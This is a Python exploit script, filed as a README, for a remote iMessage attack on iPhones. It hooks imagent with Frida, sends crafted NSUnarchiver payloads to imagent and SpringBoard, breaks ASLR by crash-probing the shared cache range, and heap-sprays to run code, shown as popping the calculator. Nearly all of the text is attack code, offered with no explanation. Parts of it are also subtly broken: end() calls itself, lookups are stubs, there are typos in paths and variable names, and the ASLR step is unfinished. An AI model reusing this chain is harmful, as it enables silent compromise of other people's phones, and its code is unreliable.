README.md
Rendering markdown...
import frida
import random
import subprocess
import sys
import time
import os
CRASH_DELAY = 10
HEAPSPRAY_ADDR = 0x140000000
SHARED_CACHE_BASE = None
SHARED_CACHE_WRITABLE_REGION_OFFSET = 0x31acc00
TARGET_APPLE_ID = '[email protected]'
# The class representing a target device to which iMessages can be sent.
class Device:
def __init__(self, apple_id):
self.apple_id = apple_id
self.ready = False
self._delivery_receipts = 0
# Set up frida hooking of imagent to inject our payloads
session = frida.attach('imagent')
code = open('./hook.js', 'r').read()
script = session.create_script(code)
script.on('message', self._on_message)
script.load()
while not self.ready:
time.sleep(1)
def send_message(self, message):
self._delivery_receipts = 0
subprocess.check_call(['osascript', 'sendMessage.applescript', self.apple_id, message])
while self._delivery_receipts == 0:
time.sleep(1)
# Send the current payload as the ATI key, which will be deserialized in imagent
# Wait until the message has been received or the waiting time surpass CRASH_DELAY.
def send_payload_to_imagent(self):
return self._send_payload('ATI')
# Send the current payload as the BP key, which will be deserialized in Springboard.
# Wait until the message has been received or the waiting time surpass CRASH_DELAY
def send_payload_to_springboard(self):
return self._send_payload('BP')
def _send_payload(self, key):
self._delivery_receipts = 0
subprocess.check_call(['osascript', 'sendMessage.applescript', self.apple_id, f'INJECT_{key}'])
count = 0
while self._delivery_receipts == 0 and count < CRASH_DELAY:
time.sleep(1)
count += 1
return self._delivery_receipts > 0
# The handler to cope with receiving message
def _on_message(self, message, data):
if message['type'] == 'send':
payload = message['payload']
if payload == 'READY':
self.ready = True
elif payload == 'DELIVERY_RECEIPT':
self._delivery_receipts += 1
else:
pass
# The generator class to generate different NSUnarchiver payload and write it to /private/var/tmp/com.apple.message/payload
class Payloads:
@staticmethod
def generate_calcpop_heapspray_payload(shared_cache_base):
subprocess.check_call(['./gen_payload_calcpop.py', hex(shared_cache_base)])
# Convert to binary format to save a few bytes.
subprocess.check_call(['plutil', '-convert', 'binary1', '/private/var/tmp/com.apple.message/payload'])
@staticmethod
def generate_kernelpanic_heapspray_payload(shard_cache_base):
subprocess.check_call(['/gen_payload_kernelpanic.py', hex(shared_cache_base)])
# Convert to binary format to save a few bytes.
subprocess.check_call(['plutil', '-convert', 'binary1', '/private/var/tmp/com.apple.message/payload'])
@staticmethod
def generate_addr_deref_payload(addr):
subprocess.check_call(['/gen_payload_deref.py', hex(addr)])
@staticmethod
def generate_fakeobj_dealloc_trigger(addr):
subprocess.check_call(['/gen_fakeobj_dealloc.py', hex(addr)])
class SharedCacheProfile:
def __init__(self, zero_map, ptr_map, tp_map):
assert(len(zero_map) == len(ptr_map) == len(tp_map))
self.base = 0x180000000
self.zero_map = zero_map
self.ptr_map = ptr_map
self.tp_map = tp_map
def map(self, new_base):
self.base = new_base
def start(self):
return self.base
def end(self):
return self.end()
def size(self):
return len(self.zero_map) * 8 * 8
def __str__(self):
return f'SharedCacheProfile profile mapped between 0x{self.start()} and 0x{self.end()}'
def isNull(self, address):
return self._bitmap_lookup(address, self.zero_map)
def isTaggedPtr(self, address):
return self._bitmap_lookup(address, self.tp_map)
def isPointer(self, address):
return self._bitmap_lookup(address, self.ptr_map)
def _bitmap_lookup(self, address, bitmap):
pass
# The function sends crash payload to walk over the address range in which the shared cache is
# mapped in 128MB steps until it finds a valid address
def find_valid_shared_cache_address(target):
# Find the valid shared cache from 0x180000000 to 0x280000000
start = 0x180000000
end = 0x280000000
step = 128 * 1024 * 1024
print('[INFO]: Trying to find a valid address ...')
for address in range(start, end, step):
print(f'Testing address 0x{address} ...')
Payloads.generate_addr_deref_payload(address)
if target.send_payload_to_imagent():
print(f'[INFO]: 0x{address} is valid!')
return address
raise Exception('Couldn\'t find a valid address ...')
def break_aslr(target):
found_address = find_valid_shared_cache_address(target)
print('[INFO]: Start breaking your ASLR, please wait ...')
# We now have a valid address inside the shared_cache. With that, and the binary profile
# of the shared cache, we can now construct a list of candidate slide offsets.
shared_cache_nullmap = open('./shared_cache_profile/shared_cache_nullmap.bin', 'rb').read()
shared_cache_ptrmap = open('./shared_cache_profile/shared_cache_ptrmap.bin', 'rb').read()
shared_cache_tpmap = open('./shared_cache_profile/shared_cache_tpmap.bin', 'rb').read()
shared_cache = SharedCacheProfile(shared_cache_nullmap, shared_cache_ptrmap, shared_cache_tpmap)
possible_base_addresses = []
page_size = 0x4000
min_base = 0x280000000
max_base = 0x180000000
for candidate in range(shared_cache.start(), shared_cache.end(), page_size):
if shared_cache.isNull(candidate) or shared_cache.isTaggedPtr(candidate):
base_address = found_address - (candidate - shared_cache.start())
if base_address > max_base and base_address + shared_cache.size() < min_base:
possible_base_addresses.append(base_address)
print(f'[INFO]: Have {len(possible_base_addresses)} potential candidates for the dyld shared cache slide')
candidates = []
for address in possible_base_addresses:
candidate = SharedCacheProfile(shared_cache_nullmap, shared_cache_ptrmap, shared_cache_tpmap)
candidate.map(address)
if candidate.start() < min_base:
min_base = candidate.start()
if candidate.end() > max_base:
max_base = candidate.end()
assert(candidate.isNull(found_address) or candidate.isTaggedPtr(found_address))
candidates.append(candidate)
assert(min_base < max_base)
print(f'[INFO]: Shared cache is mapped somewhere between 0x{min_base} and 0x{max_base}')
print(f'[INFO]: Now determining exact base address of shared cache ...')
# TODO: determine the exact base address of shared cache
def pwn(target):
print(f'[Info]: Start to exploit remote iPhone {TARGET_APPLE_ID} ...')
os.makedirs('/private/var/tmp/com.apple.messages/', exist_ok=True)
shared_cache_base = SHARED_CACHE_BASE
# Obtain
if shared_cache_base is None:
print('[Info]: Break ASLR ...')
shared_cache_base = break_aslr(target)
print(f'[Info]: Shared cache is mapped at 0x{shared_cache_base}')
target.send_message(f'Your shared cache starts at 0x{shared_cache_base}')
input('[Info]: Press enter to continue ...')
print('[Info]: Generate payload to pop calculator ...')
Payloads.generate_calcpop_heapspray_payload(shared_cache_base)
SPRAYSIZE = 768 * 1024 * 1024
MSGSIZE = 32 * 1024 * 1024
NUM_SPRAY = SPRAYSIZE // MSGSIZE
for i in range(NUM_SPRAY):
target.send_payload_to_springboard()
time.sleep(1)
print(f'[Info]: Sending heap spray part {i + 1}/{NUM_SPRAY}')
time.sleep(10)
target.send_message('Enjoy the calculator!!')
print('[Info]: Open calculator successfully!')
Payloads.generate_fakeobj_dealloc_trigger(HEAPSPRAY_ADDR + 0x3ff8)
target.send_payload_to_springboard()
time.sleep(1000)
target = Device(TARGET_APPLE_ID)
pwn(target)